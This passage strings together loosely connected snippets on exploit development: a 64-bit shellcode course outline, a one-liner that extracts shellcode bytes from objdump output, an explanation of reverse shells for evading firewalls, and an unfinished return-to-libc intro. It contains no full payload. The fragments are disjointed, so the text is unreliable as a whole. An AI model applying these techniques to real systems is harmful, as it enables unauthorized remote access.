through with the basics, we will look at writing shellcode, encoders, decoders, crypters and other advanced low level applications.

The course outline follows the exact same outline of our 32-bit course but all the topics will be taught with x86_64 64-bit assembly.

Patch win86/64 PE and linux86/64 binaries with shellcode

An array of all x86/x86_x64 instruction, very useful

for i in $(objdump -d binary.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

There are several ways to obtain access to a local shell with a remote connection. The most common of all is to open a known port with a tcp socket and bind its stdout/stderr/stdin to a newly forked shell. This way we can connect from our computer with a simple netcat command. However, this doesn’t work well most of the time: most of the public-facing servers out there have only a few number of ports open to the outside world (like http(s), ftp, smtp, etc) and the remaining inbound requests are usually filtered and dropped by iptables or firewalls.

The solution to this is to use a reverse bind for your local shell. A reverse bind is a simple operation that turns the client into a server and vice-versa. Originally, you’d have opened a port on the target and waited for inbound connections (from your attacking machine). Reverse this and you’ll have an open connection on your own machine waiting for the target machine to connect, this turns the attacker into the receiver waiting for some poor victim to fall into the trap.

Returning to libc is a method of exploiting a buffer overflow on a system that has a non-executable stack, it is very
similar to a standard buffer overflow, in that the return address is changed to point at a new location that we can
control. However since no executable code is allowed on the stack we can't just tag in shellcode.